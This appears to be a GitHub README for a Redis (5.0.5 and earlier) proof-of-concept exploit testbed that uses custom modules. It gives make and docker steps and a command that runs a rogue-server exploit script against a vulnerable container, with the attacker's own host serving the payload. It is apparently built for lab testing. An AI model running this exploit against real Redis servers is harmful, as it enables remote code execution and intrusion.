Skip to content

Latest commit

 

History

History
29 lines (19 loc) · 356 Bytes

README.md

File metadata and controls

29 lines (19 loc) · 356 Bytes

Redis PoC exploit

Testbed for Redis <= 5.0.5 exploit using custom modules

How to use

Build the exploit and a vulnerable server

make

Connect to the PoC container

docker exec -it redis-poc bash

Execute the exploit

./redis-rogue-server.py --rhost redis-vulnerable --lhost redis-poc

Clean up

make clean